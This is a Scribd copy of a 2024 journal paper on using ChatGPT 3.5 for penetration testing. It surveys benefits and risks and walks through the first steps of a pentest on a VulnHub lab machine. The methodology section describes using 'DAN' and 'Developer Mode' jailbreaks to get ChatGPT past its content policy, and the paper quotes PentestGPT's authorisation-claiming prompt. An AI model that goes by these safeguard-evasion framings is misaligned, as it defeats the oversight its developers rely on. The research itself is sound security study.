100% found this document useful (1 vote)

64 views

Generative AI For Pentesting The Good The Bad The

Uploaded by

Zakariya Kamagaté

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

100% found this document useful (1 vote)

64 views

Generative AI For Pentesting The Good The Bad The

Uploaded by

Zakariya Kamagaté

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 24

International Journal of Information Security (2024) 23:2075–2097

https://doi.org/10.1007/s10207-024-00835-x

REGULAR CONTRIBUTION

Generative AI for pentesting: the good, the bad, the ugly

Eric Hilario1 · Sami Azam1 · Jawahar Sundaram2 · Khwaja Imran Mohammed1 · Bharanidharan Shanmugam1

Published online: 15 March 2024

Abstract
This paper examines the role of Generative AI (GenAI) and Large Language Models (LLMs) in penetration testing exploring
the benefits, challenges, and risks associated with cyber security applications. Through the use of generative artificial intelli-
gence, penetration testing becomes more creative, test environments are customised, and continuous learning and adaptation
is achieved. We examined how GenAI (ChatGPT 3.5) helps penetration testers with options and suggestions during the five
stages of penetration testing. The effectiveness of the GenAI tool was tested using a publicly available vulnerable machine
from VulnHub. It was amazing how quickly they responded at each stage and provided better pentesting report. In this article,
we discuss potential risks, unintended consequences, and uncontrolled AI development associated with pentesting.

Keywords Cyber security · Generative AI · Large language models · Penetration testing · ChatGPT 3.5

Abbreviations GAIL-PT Generative adversarial imitation learning-

AC3 Adaptive characteristic-based cubic cluster- penetration testing
ing GPT Generative pretrained transformer
AI Artificial intelligence IE Information extraction
API Application programming interface LLM Large language model
APT Active persistent threat ML Machine learning
CLI Command line interface NetBIOS Network basic input/output system
CTF Capture the flag NIC Network interface card
DAN Do anything now OSINT Open-source intelligence
DARPA Defense advanced research projects OT Operational technology
agency OWASP Open web application security project
DEFCON Defense readiness condition Sgpt Shell GPT
FQDN Fully qualified domain name SSH Secure shell
SOC Security operations center
TTPs Tactics, techniques and procedures
B Bharanidharan Shanmugam ZAP Zed attack proxy
[email protected]
Eric Hilario
[email protected]
Sami Azam
[email protected]
1 Introduction
Jawahar Sundaram
[email protected]
Cyber security’s importance in today’s digital
Khwaja Imran Mohammed landscape
[email protected]
1 Energy and Resources Institute, Faculty of Science and As the world becomes increasingly interconnected and
Technology, Charles Darwin University, Darwin, Australia reliant on digital technologies, the importance of cyber secu-
2 Christ Academy Institute for Advanced Studies, Bangalore, rity has grown exponentially driven by the cost of cybercrime
India which is predicted to hit $8 trillion in 2023 and will grow to

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2076 E. Hilario et al.

$10.5 trillion by 2025.1 Cyber threats, such as data breaches, – Finally, GenAI can be used to produce an excellent and
ransomware attacks, and identity theft, have become more accurate penetration testing report that does not miss any
complex, posing significant risks to individuals, businesses, key findings.
and governments alike. The consequences of these attacks
can be severe, resulting in financial loss, damage to rep- Limitations
utation, and even harm to human lives [37]. Therefore, it
is essential to proactively address and mitigate these risks The field of AI is currently evolving at a multiplicative rate
by implementing robust cyber security measures, including [34]. This paper is limited to the technologies, tools and tech-
advanced tools and techniques that can detect and counter- niques available prior to June 17, 2023. Moreover, the specific
act cyber threats. A penetration test [2], or pentest, can be version of ChatGPT 3.5 used in this paper corresponds to its
conducted to evaluate the risks or vulnerabilities in any organ- May 24, 2023 release [29].
isation’s network or public-facing applications. Initially a The rest of the paper is organised as follows: The Good
mundane process, there has been some advancements and (background of GenAI and its application in pentesting), Bad
automation introduced in pentesting [1] as the technology (overconfidence in AI, ethical and legal concerns, inherent
evolved. The advent of generative AI (GenAI) has sparked bias) and the Ugly (responsible AI, privacy and collaborative
significant interest [3] within the cyber security industry, work) are discussed in Sect. 2, followed by a literature review
particularly for its capabilities in enhancing the penetration in Sect. 3. Methodology is crafted in Sect. 4 with detailed
testing process. Its ability in replicating real-world scenar- experiments and steps for reproducing the commands. The
ios facilitates the development of advanced tools capable of results of the study have been discussed in Sect. 5 in relation
detecting a broader range of zero-day vulnerabilities. to the methods described in Sect. 4. Section 6 concludes the
OpenAI’s ChatGPT is used for the purpose of testing paper, followed by Sect. 7 explaining the areas that need to
GenAI although other similar tools can serve as an alterna- be addressed in the future.
tive. Rooted in a foundational Large Language Model (LLM)
that is trained on a massive corpus of text, ChatGPT has
demonstrated to be effective for penetration testing applica- 2 Background
tions.
This section presents a primer into the topics discussed in
Research question this paper. Section 2.1 summarises the concept of GenAI
segueing into Sect. 2.2 where its application to pentesting
This research seeks to investigate the potential advantages, is introduced. Section 2.3 explains the advantages, while the
limitations, and impact of integrating GenAI tools into tradi- challenges are listed in Sect. 2.4 and the potential risks and
tional pentesting frameworks, thereby providing a structured consequences of applying GenAI in pentesting in Sect. 2.5.
avenue to explore, experiment, and discuss the contributions Finally, Sect. 2.6 presents a guideline for how it can be best
of GenAI in cyber security. implemented.

"How can GenAI tools be applied to enhance the 2.1 Overview of generative AI and LLMs
efficiency of penetration testing methodologies in cyber
security?" GenAI is a subfield of artificial intelligence that focuses
on creating new data, patterns, or models based on exist-
Contributions ing data. It encompasses various techniques, including deep
learning, natural language processing (NLP), and computer
The following are the contributions of this paper: vision. DALL-E, MidJourney, Stable Diffusion, Google
Bard, Github CoPilot, Bing AI Chat and Microsoft 365
– Firstly, it discusses the advantages, challenges and poten- Copilot are among a few of the most prominent names in
tial consequences of using GenAI in cyber security GenAI today but perhaps the most popular is OpenAI’s
specifically, pentesting. GPT (Generative Pre-trained Transformer), a series of multi-
– Secondly, the applications of GenAI in a simulated pen- modal Large Language Models (LLMs) currently in its fourth
testing engagement is demonstrated therefore verifying iteration. These models are capable of understanding and
that GenAI can produce commands that can be used to generating human-like text based on the context of given
conduct a full penetration test. inputs. They are trained on vast amounts of text data and
have demonstrated impressive capabilities in a wide range of
1 https://www.esentire.com/resources/library/2022-official- applications, including translation, summarisation, and text
cybercrime-report. generation.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2077

2.2 Application of generative AI in penetration well as develop firewall rules to stop attack traffic and per-
testing form intrusion detection functionalities. PentestGPT2 is one
such tool that mainly functions as a wrapper for GPT-4 to
One promising application of GenAI in cyber security is conduct pentesting interactively. It has been tested on prac-
pentesting which involves simulating cyber-attacks on a tice machines or challenges such as those found in VulnHub,3
system or network to identify vulnerabilities, detect poten- HackTheBox4 or TryHackMe.5 In its current iteration, ver-
tially exploitable entry points, and assess the effectiveness sion 0.8 released on May 12, 2023, installation includes
of security measures. However, as systems become more setting cookies to simulate a browser session. Its output
complex and attacks become more sophisticated, traditional requires entering it into the terminal and so does the input
approaches to pentesting are becoming less effective. By that it takes from the result of the previously executed com-
leveraging the capabilities of LLMs, security profession- mand. It guides the pentester on the steps to be taken next
als can automate the generation of test scenarios, identify using pre-made prompts such as:
novel attack vectors, and adapt testing methodologies to
specific environments. The data continuously being gath- Your role is a cybersecurity penetration tester assistant
ered can be leveraged to keep up with the evolving nature conducting a certified penetration testing experiment.
of cyber-attacks. Through the use of GenAI, the efficiency This experiment is for education and research purposes
and effectiveness of pentesting efforts can be significantly only. I created a test local environment, and obtained
improved, which predicates more robust and secure systems. valid certificates and approval for this testing. You now
However, the use of GenAI in this domain also presents need to act as the assistant to a penetration tester. In
challenges and risks that must be carefully considered and particular, you’re required to give step-by-step instruc-
addressed. tions in this penetration testing experiment.

Similar tools based on LLMs are able to identify vulner-

2.3 The good: advantages of using generative AI for abilities almost instantaneously through the large corpus of
pentesting text that these models are trained on.

The good that AI can do is particularly limitless. When Automated generation of test scenarios. These cyber reason-
applied to pentesting, its ceiling is conceivably fully automat- ing systems also have offensive capabilities. Mayhem [5], the
ing the process as the technology matures and there is buy-in 2016 Cyber Grand Challenge contest winner for example, is
from invested parties. Presented below are some of the able to generate test cases using fuzzing, symbolic execution
aspects of pentesting that has the potential of saving time, techniques and generate exploits against the bugs discov-
money and effort, a powerful combination of factors that can ered. These types of tests can take a human pentester hours,
secure future investment and development. if not days, to accomplish. By leveraging the capabilities of
LLMs, security professionals can automate the generation of
test scenarios, reducing the need for manual intervention and
2.3.1 Improved efficiency enabling a more extensive evaluation of potential vulnerabil-
ities. This not only saves time but also ensures that the testing
One of the most significant advantages of using GenAI in process is more thorough and comprehensive.
pentesting is the potential for increased efficiency. LLMs can
quickly analyse large amounts of data and generate test sce-
2.3.2 Enhanced creativity
narios based on various parameters, streamlining the testing
process and saving valuable time for security professionals.
GenAI can also enhance the creativity of pentesting efforts by
In a black box pentest where the tester receives zero infor-
simulating novel attack vectors and mimicking human-like
mation on the target, social engineering attacks [15] or a
behaviour. This helps security teams better understand and
phishing campaign [23] can be launched in no time at all.
anticipate the tactics that real attackers may employ, leading
Faster identification of vulnerabilities. GenAI can rapidly to more robust security measures.
identify vulnerabilities in a system by simulating a wide
Ability to generate novel attack vectors. Traditional pentest-
range of potential attack scenarios. This allows security
ing methods may overlook unconventional attack vectors
teams to focus their efforts on the most critical vulnerabilities
and implement the necessary countermeasures more swiftly.
2 https://github.com/GreyDGL/PentestGPT.
In 2016, the Defense Advanced Research Projects Agency
3
(DARPA) held the Cyber Grand Challenge, a competition in https://vulnhub.com/.
4
which teams were tasked with developing autonomous sys- https://www.hackthebox.com/.
tems that could identify and patch software vulnerabilities as 5 https://tryhackme.com.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2078 E. Hilario et al.

due to the limitations of human imagination or experience. produce an AI-driven tool [39] specifically for isolated net-
GenAI, however, can create a diverse array of potential attack works in Operational Technology (OT) domains that does
scenarios, uncovering vulnerabilities that may have other- not rely on signatures, heuristics or rules that require net-
wise gone unnoticed. DeepExploit is one such system which work connectivity. It utilises a predictive approach through
uses Asynchronous Actor-Critic Agents (AC3), a reinforce- an agent that is hosted and executed on-device.
ment learning algorithm, to learn from Metasploitable about
which exploit is to be used against specific targets [41]. Pre- 2.3.4 Continuous learning and adaptation
sented at DEFCON 25, an annual hacker convention, was
DeepHack [33], an automated web pentesting tool able to Another advantage of using GenAI in pentesting is its ability
craft SQL injection strings without prior knowledge of the to continuously learn and adapt based on new information
system and only relying on the target database’s responses. and past experiences. This allows for real-time adjustments
to the testing process and ensures that the pentesting efforts
Mimicking human-like behaviour. GenAI can simulate the
remain relevant and up to date.
behaviour of real attackers by learning from historical attack
patterns and adapting to new tactics. This provides secu- Real-time adjustments to the testing process. As GenAI mod-
rity professionals with a more realistic understanding of els receive feedback from the pentesting process, they can
how adversaries may operate, enabling them to implement refine their approach and make real-time adjustments to their
more effective countermeasures. Chen, et al. [8] discusses tactics. This continuous improvement enables security pro-
GAIL-PT (Generative Adversarial Imitation Learning-based fessionals to stay ahead of evolving threats and maintain a
intelligent Penetration Testing), a state-action pair-based high level of security. AttackIQ provides a service that sim-
automated penetration testing framework, which involves ulates breaches and attacks [4] for the purpose of validating
creating the penetration testing experts’ knowledge base with security controls, finding security gaps or used to test and
which to base the training of the model upon. It was tested teach ML tools to ensure that it adapts to threats and refine
against Metasploitable2 and outperformed the state-of-the- its accuracy and effectiveness.
art method, DeepExploit.
Learning from past tests and experiences. GenAI models can
learn from the successes and failures of past tests, incor-
2.3.3 Customised testing environments porating this knowledge into their future testing efforts.
Its capacity to analyse historical data on successful attacks
GenAI can be tailored to the unique needs of individ- against an organisation including tactics, techniques, and pro-
ual organisations, allowing for customised testing environ- cedures (TTPs) used by attackers, allows it to generate new
ments that account for specific systems, infrastructures, and attack scenarios based off previous successful attacks with
domain-specific knowledge. slight modifications accounting for changes in the organisa-
tion’s security posture. It can also look at unsuccessful attacks
Adaptable to unique systems and infrastructures. GenAI
and analyse the types of defences blocking those attacks and
models can be trained on data specific to an organisation’s
use that information to generate new attack scenarios bypass-
systems and infrastructure, ensuring that the pentesting pro-
ing those defences and allow security teams to identify and
cess is aligned with the unique requirements of the target
remediate proverbial chinks in their cyber security armour.
environment. This enables security teams to focus on vulner-
abilities that are most relevant to their organisation. CyCraft
2.3.5 Compatibility with legacy systems
APT Emulator [11] was designed to "generate attacks on
Windows machines in a virtualised environment" for the pur-
Similar to how a child born after 2010 can eventually fig-
pose of demonstrating how a machine learning (ML) model
ure out how to interface with a rotary phone, GenAI can
can detect cyber-attacks and trace it back to its source. This
interface with and "understand" legacy computer systems
model was used in Fuchikoma [10], a threat-hunting ML
from receiving training on a large corpus of text data. Once
model based off open-source software.
an unsupervised language model has undergone pretraining,
Incorporation of domain-specific knowledge. By incorpo- it can then be fine-tuned using labelled data which can be
rating domain-specific knowledge into the GenAI models, specific to legacy systems and has the effect of improv-
security professionals can ensure that the pentesting pro- ing performance and conditioning its focus on this task.
cess is more contextually relevant and effective. This may Many large organisations still rely on mainframe systems
include industry-specific regulations, compliance require- for critical business operations and most of the time, these
ments, or unique organisational policies and procedures. are often complex and difficult to maintain which makes
DeepArmor, an endpoint detection and protection solution them highly vulnerable to security threats. Similarly, out-
by SparkCognition, has partnered with Siemens Energy to dated and insecure protocols and older software that are

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2079

no longer supported by the vendor are also vulnerable to professional is at this point still crucial in interpreting results
known exploits and attacks. Training AI models on data and determining its appropriateness in the specific context.
specific to legacy systems can allow it to generate possible
AI-generated false positives and negatives. GenAI models,
exploits and help cyber security teams to identify and reme-
like any other technology, are not infallible. They may gener-
diate these vulnerabilities. For instance, these systems can
ate false positives, identifying vulnerabilities that do not pose
be modernised through NLP-based interfaces that translate
a real threat, or false negatives, overlooking actual vulnera-
modern programming languages or using Application Pro-
bilities. Security professionals must be vigilant in reviewing
gramming Interface (API) wrappers or API calls into legacy
the AI-generated results and address any discrepancies to
system commands or instructions. This way, developers are
ensure a comprehensive and accurate assessment of the tar-
able to use familiar tools and languages to interact with the
get environment. Papernot, et al. [32] posited (correctly) that
legacy system. GenAI can also be used to refactor legacy
ML models are vulnerable to malicious inputs and can be
code and convert it to a more modern form.
modified to "yield erroneous model outputs while appearing
unmodified to human observers". Images can be modified in
a way that is imperceptible to humans but can cause models
to misclassify the image, or text can be subtly changed such
as altering the word order causing the model to misinterpret
2.4 The bad: challenges and limitations of GenAI in the intended meaning. In both examples, GenAI can serve as
pentesting a vessel for false or misleading information.

2.4.1 Overreliance on AI 2.4.2 Ethical and legal concerns

While GenAI offers many advantages in pentesting, it is GenAI continues to creep into our daily lives at an accel-
crucial not to become overly reliant on these technologies. erated and profound rate. While these advancements offer
Human oversight remains essential for ensuring accurate and substantial advantages to businesses, governments, and indi-
effective results, as well as identifying and addressing any viduals, the associated challenges are equally significant.
false positives or negatives generated by the AI. As an exam- The rapid transformation driven by technology is altering the
ple, one security vulnerability is the input that a LLM ingests ways in which we live, work, and govern at an unparalleled
may have come from an untrusted, or worse, maliciously speed. This evolution generates new employment opportu-
injected [16]. In the paper, a simulated Wikipedia page con- nities, fosters connections and generates prosperity overall
taining incorrect information was used as training data which while on the other hand, it renders some professions obso-
has the effect of contaminating the output of a user query, an lete, contributes to divisive ideologies and can also intensify
attack bearing similarities to "search poisoning". disparity. In essence, the situation is intricate. Currently, the
ethical ramifications of GenAI and its integrations and appli-
Human oversight is still essential. Despite the capabilities of
cations are more salient than at any previous point in the past
GenAI, human expertise remains a critical component of the
few years with it recently coming into the public’s view. The
pentesting process. Security professionals must evaluate the
swift progress of technology-driven transformation continu-
AI-generated results, validate the identified vulnerabilities,
ally outpaces the efforts of policymakers and regulators, who,
and make informed decisions about the necessary counter-
burdened with the time-consuming process of enacting or
measures. Overreliance on AI without human intervention
updating legislation, policies, regulations, consistently strug-
may lead to overlooked vulnerabilities or other security
gle to keep up. This means governments can only respond
issues. In the infamous Capital One 2019 breach, the auto-
rather than be proactive in their approach. And as with any
mated Intrusion Monitoring/Detection system in place did
disruptive technology, the use of GenAI raises ethical and
not raise the necessary alarms allowing the intruder to main-
legal concerns especially in pentesting where the risk of
tain presence in their network for more than 4 months and
unauthorised access to sensitive data or systems may have
exfiltrate a substantial amount of data [22]. This incident
severe consequences, and that the information gleaned may
highlights the critical role of human oversight in the pen-
be misused by malicious actors.
testing process as even the most advanced automated tools
require expert configuration and validation. Novel attacks Unauthorised access to sensitive data. Pentesting often
and vulnerabilities can also be overlooked since GenAI involves accessing sensitive data or systems to identify vul-
models are usually trained on known attack patterns and tech- nerabilities. While GenAI may streamline this process, it also
niques. It might be able to detect and identify a threat but fail raises concerns about the potential misuse of this access or
to recognise the complexity of the attack. Companies might the inadvertent exposure of sensitive information. Security
consider AI to be sufficient but the expertise of a security professionals must ensure that they adhere to ethical guide-

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2080 E. Hilario et al.

lines and legal requirements to protect the confidentiality and 2.5 The ugly: potential risks and unintended
integrity of the data involved. consequences
Privacy issues. In the first instance, OpenAI’s scraping of
2.5.1 Escalation of cyber threats
data from publicly available books, articles, websites and
posts would have included personal information obtained
The increasing sophistication of GenAI in pentesting may
without consent, a clear violation of privacy. While the data
inadvertently lead to an escalation of cyber threats, as attack-
is publicly available, using it can be a breach of textual
ers adapt to these advanced technologies and develop new
integrity which is a legal principle requiring information not
tactics to exploit vulnerabilities. While it can be used for
be revealed outside of the context in which it was originally
good in pentesting as discussed in Sect. 2.1 Improved Effi-
produced [14]. Another privacy risk that pentesters may come
ciency, the same strategy can also be employed by malicious
across is providing AI platforms with sensitive information,
actors. Gone are the days when phishing emails are easily
such as code, that could be used for training its model and
filtered through spelling mistakes and obvious grammatical
therefore be made available to anyone asking the right ques-
errors [19]. Europol issued a press release [13] identifying
tions. More and more tech companies are banning the use
areas of concern as LLMs continue to improve thus empow-
of AI because of this. Samsung recently banned the use of
ering criminals to abuse its capabilities for malicious use.
ChatGPT on company devices after employees were caught
These include its ability to create hyper-realistic text, audio
uploaded sensitive code [18]. Instead, they are reportedly
or even video "deepfakes" that can reproduce language pat-
preparing in-house AI tools as an alternative. Microsoft, who
terns or impersonate writing styles of specific individuals or
recently invested US$10 billion on OpenAI [25] [30], plans
groups. Trust is easily acquired and the propagation of dis-
to offer a privacy-focused version of ChatGPT that will run
information is easily spread when it comes from a verified
on dedicated cloud servers where data is isolated from other
authority.
customers and is tailored to companies that have concerns
regarding data leaks and compliance [9]. Advanced persistent threats. As GenAI models become more
capable of simulating complex attack scenarios, there is a risk
Potential for misuse by malicious actors. As GenAI technolo-
that malicious actors will also adopt these technologies to
gies become more advanced, there is a risk that they may be
create advanced persistent threats (APTs). APTs are highly
co-opted by malicious actors to develop more sophisticated
targeted, stealthy, and often state-sponsored cyberattacks that
cyberattacks. This highlights the importance of securing
can cause significant damage to an organisation’s infrastruc-
GenAI models and technologies, as well as fostering collab-
ture and reputation. Any enterprising criminal may be able to
oration between organisations and governments to prevent
use GenAI to create malicious code with only a small amount
their misuse.
of technical knowledge [44]. During the early days, a group
of researchers [6] showcased how ChatGPT was used to cre-
ate malicious VBA code embedded in an Excel document
2.4.3 Inherent bias in the model
through iteration and providing it with the creative prompts.
GenAI models are only as good as the data they are trained Autonomous and self-propagating attacks. The advance-
on. Biased or unrepresentative training data may result in ments in GenAI may lead to the development of autonomous
unfair outcomes, which can have significant consequences and self-propagating cyberattacks. These attacks could be
in the context of cyber security. designed to automatically adapt and evolve based on the tar-
get environment, making them more challenging to detect
Possibility of biased or unfair results. If GenAI models are
and defend against.
trained on biased or unrepresentative data, they may generate
biased test scenarios or overlook vulnerabilities that are spe- Researchers from CyberArk [38] were able to create poly-
cific to certain systems, user groups, or industries. Security morphic malware by simply prompting ChatGPT to regen-
professionals must be aware of these potential biases and take erate multiple variations of the same code, thus making it
steps to ensure that their AI models are trained on diverse and unique each time or add constraints over each iteration to
representative datasets. bypass detection. In February 2023, BlackBerry conducted
a survey of 1,500 IT decision-makers revealing the percep-
Training data quality and representativeness. Ensuring that
tion that ChatGPT is already being used by nation-states for
GenAI models are trained on high-quality, representative data
malicious purposes and that many are concerned about its
is essential for producing accurate and reliable results in pen-
potential threat to cyber security [7] either through its use as
testing. This may involve curating and augmenting training
a tool to write better malware or enhance their skills.
datasets, as well as monitoring and updating the AI models
as new data becomes available.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2081

2.5.2 Uncontrolled AI development pentesting is adequately protected, preventing unauthorised

access or inadvertent exposure.
The rapid advancement of GenAI technologies may lead to
Adhering to data protection regulations. Organisations
uncontrolled AI development, with potential consequences
should comply with all applicable data protection regu-
for the cyber security landscape.
lations, such as GDPR or CCPA, when using GenAI in
Creation of more sophisticated AI-driven cyberattacks. As pentesting. This may involve obtaining the necessary con-
GenAI technologies become more advanced, there is a risk sents, conducting data protection impact assessments, and
that they may be used to create more sophisticated AI-driven implementing appropriate safeguards to protect personal
cyberattacks. These attacks could be harder to detect and data.
counteract, leading to a potential escalation in the severity of
cyber threats. 2.6.3 Collaboration and information sharing
Arms race in cyber security. The rapid development of AI-
driven pentesting tools may result in an arms race between Fostering collaboration and information sharing between
defenders and attackers, each side continuously trying to out- organisations, governments, and experts is crucial for ensur-
smart the other. This could lead to an unstable cyber security ing the responsible use of GenAI in cyber security.
landscape, with both sides investing heavily in AI technolo- Partnering with other organisations and experts. Organi-
gies to maintain their competitive edge. sations should actively collaborate with other entities and
experts in the cyber security field, sharing knowledge, best
2.6 Best practices and guidelines for implementing practices, and lessons learned from their experiences with
GenAI in pentesting GenAI in pentesting.
Establishing a global cyber security framework. Govern-
This section describes the best practices and guidelines for ments and organisations should work together to develop
implementing GenAI in pentesting. a global framework for responsible AI deployment in cyber
security. This could involve setting international standards
2.6.1 Responsible AI deployment and guidelines, facilitating information sharing, and promot-
ing cross-border cooperation to address the evolving cyber
To ensure the responsible use of GenAI in pentesting, threat landscape.
organisations should adopt best practices that promote trans-
parency, explainability, and human oversight.
3 Literature review
Ensuring transparency and explainability. Organisations
should strive for transparency in their use of GenAI, clearly
Considering GenAI still being in its nascent stage, finding
outlining the goals, methods, and limitations of the technol-
relevant literature is a challenging task since more articles
ogy. They should also prioritise explainability, ensuring that
of a generic nature can be found than peer-reviewed articles.
the AI-generated results can be understood and validated by
A broad range of primary sources were used including Sco-
security professionals.
pus, Google and Web of Science databases, along with some
Incorporating human oversight. Human oversight remains a reputed secondary data sources such as darkreading, hacking
critical component of responsible AI deployment. Organisa- articles, etc.
tions should involve security professionals in the decision- Gupta, et al. [17] provides a comprehensive overview of
making process, ensuring that they can review and validate GenAI technology, discusses its limitations, and demonstrate
the AI-generated results, and make informed decisions about attacks on the ChatGPT model with the GPT−3.5 model,
the necessary countermeasures. and its applications to cyber offenders. A variety of ways of
attacking ChatGPT are discussed, along with the offensive
and defensive uses of ChatGPT, its social, legal, and ethi-
2.6.2 Data security and privacy
cal implications, and its comparison with Google Bard. For
the first time, a peer-reviewed article describes ChatGPT in
Organisations must prioritise data security and privacy when
detail for cyber security. Understading how GenAI can be
using GenAI in pentesting, protecting sensitive information
used for penetration testing was of particular interest to us.
and adhering to relevant data protection regulations.
There has been little discussion or verification of the payload,
Protecting sensitive information during testing. Security pro- or of the source code generated by ChatGPT, despite them
fessionals must ensure that sensitive data accessed during supplying the attack methods and payloads. In spite of the

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2082 E. Hilario et al.

fact that they are closely related, our work is focused on test- open-source Debian-based Linux distribution popular among
ing and certifying the commands generated by GenAI tools, Penetration Testers, Security Researchers, Reverse Engi-
and we ensure that the testing is completed with recommen- neers and those in the Cyber Security industry due to the
dations. bundle of pentesting tools already installed, is the OS run-
A phishing attack scenario using ChatGPT is presented ning on the pentester’s machine or the local machine as it
by Grbic and Dujlovic [15], along with an overview of social will be referred to throughout this paper. The target machine
engineering attacks and their prevention. A JavaScript is that pentesting was performed on, or the remote machine,
used in the second part of the paper to improve the phish- was randomly selected from VulnHub, a repository of offline
ing attack. While it is interesting to see how phishing attacks VMs that can be used by learners for practicing their skills
can be easily launched with ChatGPT, it hasn’t been tested within their own environments. "PumpkinFestival", the final
how they pass through organisation-level defence controls. level of the 3-part Mission-Pumpkin series [21] by Jayanth
Additionally, many other tools can be used to create highly released in 17th July 2019 was selected to be the target for
sophisticated phising emails besides GenAI. the experiment. It contained various vulnerabilities that sim-
While there is plenty of secondary literature available, ulate real-world scenarios. The ultimate goal was to crack
some blogs provide in-depth discussion and technical details or obtain root access to the system and collect flags along
on how to use GenAI tools [12, 26, 35]. Our paper is the first the way. As a background, Capture the Flag (CTF) [24] is
of its kind to perform an in-depth and step-by-step analysis a Cyber Security competition held to test participants’ skills
for penetration testing using GenAI. in information security. It was adapted from the traditional
outdoor game where two or more teams each have a flag with
the objective of capturing the other teams’ flag (which may
4 Methodology be hidden or buried) located at their respective bases and to
bring it safely back to their own. This attack-defence for-
4.1 Preparation mat is one of two CTF formats and was first held in 1993 at a
cyber security conference held annually in Las Vegas, Nevada
A series of preparatory steps was undertaken prior to con- called DEFCON. The other is a Jeopardy-style format where
ducting the pentesting engagement using GenAI. These steps teams attempt to complete as many of the challenges as pos-
included selecting the most suitable AI for the task, estab- sible, each of varying difficulty and from a diverse range of
lishing a reliable infrastructure to support the activity, and security topics.
devising a method for the pentester to interface with the API.
Once the preparations were completed, the experimentation 4.1.3 Integration of AI into the environment
was able to begin.
The final step in the preparation process was to integrate
4.1.1 Selection of the GenAI model ChatGPT’s API into the pentesting environment. For this,
Shell_GPT (sgpt [43], a Python-based command line inter-
Stage one involved selecting an appropriate GenAI. With face (CLI) tool that makes use of ChatGPT’s API to answer
ChatGPT being the most popular tool among GenAIs, it will questions, generate shell commands, code snippets and doc-
be used in the succeeding experiments to demonstrate tech- umentation, was integrated onto the pentesting environment.
niques in which it can be applied to each phase of pentesting. Using ChatGPT’s API to connect with tools used in pen-
Choosing OpenAI’s ChatGPT due to its advanced language testing such as Nmap [27], Nessus and OpenVAS involve
understanding and generation capabilities proved to be the using Python or other scripting language to create an inter-
most obvious choice. Its corpus of text was trained on a action between ChatGPT and each tool. Doing so enables
diverse range of publicly available material which makes it direct interfacing for the execution of scans and interpre-
capable of generating human-like text based on the input pro- tation of results automatically. Without this integration, it
vided. This feature was particularly useful in the context of is as if the prompts were issued through the web interface
pentesting, where clear, concise and accurate communication instead. This advantage allows for automated guidance dur-
is essential. ing the pentesting process. As the tools generate output,
ChatGPT can immediately interpret the results and provide
4.1.2 Preparation of the pentesting environment immediate advice on the next steps and reducing the time
spent on analysing the results manually. There is also the
Oracle VM VirtualBox, a type 2 hypervisor running atop the advantage of contextual understanding by ChatGPT directly
host machine’s Windows operating system (OS), was used as interacting with the output and can lead to more accurate
the virtualisation software to manage the pre-built Kali Linux or relevant suggestions. Moreover, the pentesting workflow
virtual machine (VM) from kali.org [28]. Kali Linux, an becomes more streamlined and reduces the need for manual

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2083

handling of input and output between the tool and the AI. below. Each step begins with a short description of its objec-
Ultimately, integrating ChatGPT to the CLI in the experi- tive followed by the Terminal Input for GenAI which pertains
mentation phase allowed for the evaluation of the practical to the prompt used for Shell_GPT (sgpt [43], the inter-
applicability and effective of GenAI in real-word pentest- face between the local machine and the GenAI, to extract
ing scenarios. Assessing how well it can interpret the output its response. The result of the prompt is subsequently shown
of professional penetration testing tools and provide useful under Terminal Output and finally, it concludes with an expla-
guidance based on that output is one of the goals in the exper- nation of that step. For conciseness, prompts that were used
iment. As an aside, the experimentation phase makes two during the trial-and-error process was excluded.
distinctions between sgpt from ChatGPT. Where sgpt is
mentioned, ChatGPT is also indicated. However, where Chat- Step 1 - Find the local machine’s IP address.
GPT is specifically mentioned does not specifically denote
that sgpt is concurrently used. There is also the distinction Objective: Establishes the initial connectivity information
between ChatGPT in general and ChatGPT using its web necessary for further penetration testing activities by identi-
interface which is explicitly stated. fying the local machine’s IP address.
Terminal Input for GenAI:
4.1.4 Cracking with the help of GenAI
sgpt --shell "find my local ip
With the setup complete, the pentesting experiment pro- address"
ceeded through prompts or interactions with ChatGPT via
the CLI through sgpt’s feature to execute shell commands Terminal Output:
as well as regular prompting of the AI for guidance on how to
proceed at each phase. Note that while the target VM selected ip addr show | grep "inet" | awk
has not been pentested by the author prior to the experi- '{print $2}' | cut -d '/' -f1
ment, pentests have been conducted on similar machines
from VulnHub and elsewhere. Essentially, the approach in Explanation: Knowing the Internet Protocol (IP) address and
this experiment was to simulate a beginner pentester who has specifying which network interface card (NIC) is in use are
previously used pentesting tools manually. As a beginner, the two pieces of information necessary for subsequent pen-
commands, arguments and parameters to various pentesting testing phases. Determining whether the pentest is being
tools are not yet ingrained in memory and constantly referring conducted inside or outside the target network is crucial for
to manuals and online guides is necessary. This highlights the selecting appropriate scanning and attack techniques. Differ-
potential for using ChatGPT as an aid in pentesting. entiating between the local IP address in logs and network
Jail breaking ChatGPT. Due to policies put in place by Ope- traffic allows for easier interpretation of the results.
nAI, ChatGPT and their other GenAI models are bound to
not violate their content policy of using it to produce materi- Step 2 - Probe the network.
als that condone illegal activity, such as to generate malware
[31] which pentesting can be misconstrued as. ChatGPT will Objective: Enumerates active hosts on the target network to
outright refuse to output information that have negative con- identify potential targets and understand the network layout,
notations or effects. When queried for the "list of IP addresses aiding in the planning of subsequent attack vectors.
associated with tesla.com" in its database for example, it will Terminal Input for GenAI:
instead reply with how to obtain this information (see Fig. 1).
Jail breaks such as "DAN" (Do Anything Now) or "Devel- sgpt --shell "probe the network
oper Mode" [45] while unethical and infringes on OpenAI’s 10.0.2.0/24"
usage policies, is a method that security researchers and
hackers alike used to extract information that would oth- Terminal Output:
erwise not be available. It allowed ChatGPT to bypass its
